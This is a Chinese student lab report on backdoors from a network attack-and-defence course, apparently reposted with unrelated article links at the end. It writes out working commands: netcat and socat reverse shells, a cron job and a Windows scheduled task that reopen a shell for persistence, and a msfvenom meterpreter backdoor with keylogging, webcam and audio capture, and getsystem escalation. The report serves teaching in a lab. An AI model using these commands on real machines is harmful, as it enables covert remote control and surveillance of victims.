2018-2019-2 《网络对抗技术》Exp2 后门原理与应用 20165210
2018-2019-2 《网络对抗技术》Exp2 后门原理与应用 20165210实验内容:
基础问题回答:1.例举你能想到的一个后门进入到你系统中的可能方式?
2.例举你知道的后门如何启动起来(win及linux)的方式?
3.Meterpreter有哪些给你映像深刻的功能?
4.如何发现自己有系统有没有被安装后门? 实验过程:准备工作:打开win10主机,kali虚拟机,分别输入ipconfig和ifconfig得到两个机子的IP地址(192.168.199.208、192.168.16.132) 双方互相获取对方的Shell首先是Windows:先进入cmd,在netcat文件下输入命令 ncat.exe -l -p 5210 开启监听,5210为监听端口号 nc 192.168.199.208 5210 -e /bin/sh 反弹连接,此时Windows获得了linux Shell如图 接下来是Linux:操作类似,先在虚拟机命令行上输入 nc -l -p 5210 Windows反弹连接,在命令行输入指令 ncat.exe -e cmd.exe 192.168.16.132 5210 这样Linux就获得了Windows的控制权如图 使用netcat传输数据在Windows的命令行输入命令 ncat.exe -l 5210 对5210端口进行监听,在Linux命令行里输入 ncat 192.168.199.208 5210 连接到5210端口,并传输一些数据,然后就可以在Windows中看到传输的数据了如图 cron启动在Windows下,命令行输入ncat.exe -i -p 5210,监听5210端口 crontab -e 打开crontab,然后选择第三个,i编辑,在最后一行加上 06 * * * /bin/netcat 192.168.199.208 5210 -e /bin/sh 我当时的时间是04所以我选了06,就是在每小时的06分运行此命令如图 到06分后就可以看到已经获取了Linux的Shell如图 使用Socat获取主机操作Shell,任务计划启动打开Windows的计算机管理任务,点击任务计划程序,创建任务如图 新建触发器,选择工作站锁定所有用户如图 在操作中,将选择程序脚本路径,参数一栏填 tcp-listen:5210 exec:cmd.exe,pty,stderr 完成创建右键点击运行,然后在kali里输入 socat - tcp:192.168.199.208:5210 获取Windows的Shell如图 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell首先先生成一个后门: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.16.132 LPORT=5325 -f exe > 20165210.exe 将生成的文件放到Windows(我直接拖到了Windows桌面)然后kali这面直接输入命令msfconsole启动。如图 进入了msf控制台,输入 use exploit/multi/handler 启用监听,然后输入 set payload windows/meterpreter/reverse_tcp 设置payload,然后输入 set LHOST 192.168.16.132 最后输入 set LPORT 5210 设置端口号,然后exploit开始监听 在Windows中运行后门 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权获取目标主机的音频和获取目标主机的摄像头如图 还有一些比如通过命令 keyscan_start 记录下击键的过程 keyscan_dump 读取击键的记录等 getuid 查看当前用户,使用 getsystem 进行提权 实验中的问题、体会和收获
(编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
- Windows 8 – Windows 8模拟器不起作用
- windows – 通过USB端口发送和接收数据
- .net – WPF中的应用程序级快捷键
- windows – 批处理脚本传递多个参数进行调用
- win10 升级导致找不到SQL Server配置管理器
- windows phone 7 – Windows Phone 7(WP7)PhotoChooserTask
- 如何仅使用内置的内容(批处理脚本,资源管理器等)在Windows上
- windows – win32编程中的顶级窗口究竟是什么?
- xaml – 在开发Windows 8 Store应用程序时处理不同的方向
- Windows Powershell Vim Keybindings